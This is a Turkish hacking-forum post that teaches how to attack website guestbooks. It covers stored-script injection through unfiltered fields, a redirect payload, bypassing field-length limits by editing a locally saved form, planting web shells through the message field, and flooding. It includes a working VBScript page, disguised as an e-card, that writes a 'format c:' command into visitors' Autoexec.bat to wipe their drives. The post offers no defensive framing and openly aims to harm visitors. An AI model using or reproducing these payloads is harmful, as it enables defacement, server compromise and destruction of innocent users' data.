Ziyaretçi def & GUestBook HACKING
Alt 29. June 2007, 18:40   #1 (permalink)
BLOKED
Uye Olmayan
 
BLOKED - ait Kullanıcı Resmi (Avatar)
 
Uye No:
Mesajlar: n/a

Seviye: -INF [Seviye Durumu]
Aktiflik: NAN / -INF
Güç: -INF / -INF
Deneyim: NAN%

Ziyaretçi def & GUestBook HACKING

TERÖR
22-10-2005, 13:57
. Eski bir olay ama, bilmeyenler çok var.

Ben de oturuup, yazayım dedim olayı.

İlk olarak Mantık önemli . Ziyaretçi defteleri sizden, Mesaj , başlık vede bazıları nick, mail isterler. Şİmdi Siz oraya mesajınızı yazın, başlığınmızı düzgün atın. Güzel bişler yazın. Ve gönder dediğinizde, yazdıklarınız FİLTRE lerden geçerek [u>MSSQL , MYSQL ,MDB,TXT hangi veri tabanını kullanoıyorsa oraya yazdıklarınız kaydoluyor. Daha sonrada, Sizi Ziyaratçi defterinin sayfasına yönlendirtiyor. Aa bir bakıyorsunuz SİZİn yadıklarınız çıkmış ordaa. Yani ben bu yöntemle siteye bişiler yazdırabiliyorum. Hımm Şimdi burda ben öyle birşey yazdırmalıyım ki, Orda o kod , java artık ne yazdırııyorsam orda ÇALIŞMALI.

Olayımız problemmimiz budur. Bana gelen sorular şöylee ? Ziyaretçi defterine ne tür zararlar veririz..

- Eğer Ziyaretçi defteri Gerekli Filtrelemeleri yapmadı ise, Siz herşeyi yapaiblirisiniz. . Eğer ki Önlem alınmadı isee devam ediiiyorum..

Basit bildiğiniz bişi bu, 1 sn sonra site istediğiniz yere yönlenecek bir KOD verecem. Orda 1 yerine iseter 0 ,iseterse 3 size kalmış cinsi saniyedir ama..
&lt**** [Only registered and activated users can see links] content=1;URL=[Only registered and activated users can see links]>


Bakınız Bunu, Nick, başlık, mesaj kısmına neresi göreyorsanız oraya yazın. Çünkü webmaster Mesaj kısmına Fİltre koydu ise, siz Başlık kısmı sayesiyle yönlenecektir bu seferde.

Şİmdi bazı akıllı Webmasterlar, BAşlık kısmına 20 harf ilee kısıtlıyor. Siz o sayfayı PC nize kaydedin HTML olarak . Sonra o html sayfasını Notepad de açın. Action değerini düzeltin. vede BAşlık İnputundaki maxlength=21 size="37" gibi iki değer yada birini görürsünüz. Onları silin ve tekrar SAve edin. Sonra O PC nizdeki HTML yi çalıştırın ve kodlarınızı tekrar yzın. Başlık kısmınada. BU sefer başlık kısmında TÜm kodu yazabileceksiniz . Sonra SEND ne vardsa Gönder deyin. VEde böylelikle hem kendi PC nizden POST yapmılş olacaksınız, hemde webmaster ın o 20 karakter korumasını geçmiş olacağız. Böylece, başlık kısmında ekstra filtreleme yapmadığı için , Sizin kod çalışmış olacaktır..


Bakınız, MESAj kısmında Eğer sizin yönlendirme çalışıyor isee, unutmayın. O Ziyaaretçi defterinde FSO yani Zehir çalıştırma şansınızda vardır. ASP bir site ise, asp türü zehir, yada php türü
. NASIL Zehir atarım peki?

-BAsit beyler. Mesaj kısmı bölümüne, Yaa UPLOAD FSO lu kodlarını Yazarsınız, yada Zehir 2,3,4 ne versa, onun kodlarını O mesaj kısmınaa yazın. Vede gönderin. Eğer yönlendirme çalışıyor ise, bu zehir in çalışmasıda %50 dir. Ayrıca, zehir 2 3 yüklerseniz, pacth kısmını = ziyaretçi defterin ana sayfası asını yazın. Olay budur. Ziyarteçi defteri içinde siizin Zehir de çalışacaktır.

Ama eğer komplex , filtreli bir Ziyaretçi defteri isee, yemez buu =))

Mesela Size başka bir şeyden bahsedim, yabancı Guestbooklara saldırı anlatayım. Ama bu seferkinde, siz yabancılara zarar vereceksiniz :idea: nasılmı. .. Yabancıların PC lerine FORMAT attırmak istersinzi dimi.. Eğer sizin yönlendirme çalışıyor isee, ziyaeretçi defterinde, buu kod da çalışacaktır.


&lthtml>
&lthead>
&lt**** [Only registered and activated users can see links]"Content-Type" content="text/html; charset=iso-8859-9">
&lttitle>TERÖR</title>
</head>
&ltbody>
&ltscript language="VBSCRIPT">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:Autoexec.bat", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
</script>
&ltp>Giriste acılan uyariya "HAYIR" dediyseniz &lta
href= "&lti>javascript</i>:reload()">Malesef e-kart ınız calısmayacaktır.</p>
</body>
</html>


bu olay. YA bunu ziyaretçi defterine mesaj kısmına yazığı gönderin yada, bu kodları HTML yapıp. kendi siztenize , Free hostunuzaa yükleyin. VEDE ziyaretçi defterinide Yönlendirme kodu ilee ,bu html ye yönlendirrir. Her iki olayda aynı kapıya çıkar.




ayrıca size yamayı unutum. Şimdi eğer Fİltre var ise nolur?
- Basit Hiç biş , sizin kod çalışmaz vede ziyaretçi defterinde o kodunuz kalır. Biraz değişmiş şekli ilee .. KOrunma yöntemöleride kolay. İSteyene yazabilirim onlarıda..

Bir soru gelmişti bana., Ziyaretçi defterine SQL İnjeciton yapılırmuı diye?Yapsanda işine yaramaz. Ayrıca yapılacak bir yeride yok . :cool2: BElki Komplex bir yapı vardsa, zorlasak yapılabilir. Ondada SQL injeciton yazımda, okuyabilirisniz. Veri tabanını havaya uçurmayı hahah =)


Ayrıca Ziyaretçi defterlerine FLOOD da yapılabilir. bulduğunuz 100 defterden anında =) FLOOD işee yarar. hahah :yes: bunaa önlem almıyoo ne yazııkii.. Böylece Db i şişirebilirsiniz.
  Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler
Stil Konuyu değerlendir
Konuyu değerlendir:

Yetkileriniz
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık
Gitmek istediğiniz klasörü seçiniz

Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
Ziyaretçi defteri kodu sanatkar Hazır KodLar 10 20. August 2008 00:03
Sitenin arka planina ziyaretçi karar versin AntiGrevit@syon Hazır KodLar 0 17. July 2007 14:33
SQL Injection ile hacking BLOKED Web Hacking&Security 1 7. July 2007 15:17
mail hacking BLOKED Mail Hacking&Security 0 23. June 2007 14:20
Web Hacking Yöntemleri BLOKED Web Hacking&Security 1 22. June 2007 20:50



Bütün Zaman Ayarları WEZ +3 olarak düzenlenmiştir. Şu Anki Saat: 23:03 .


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.

DosyaArsivi.Com® [22.06.2007]

eXTReMe Tracker

signaTURK.Com® Hosting bir DosyaArsivi.Com® Hizmetidir.


173, 171, 172, 170, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 249, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 259, 52, 53, 54, 56, 57, 58, 248, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 150, 151, 152, 153, 154, 155, 156, 157, 158, 237, 168, 183, 179, 160, 175, 178, 167, 162, 163, 164, 165, 166, 1, 176, 177, 180, 181, 182, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 201, 200, 199, 202, 203, 204, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 222, 219, 220, 221, 229, 230, 231, 232, 233, 234, 235, 236, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 250, 251, 252, 253, 254, 255, 256, 257, 258, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 276, 277, 278,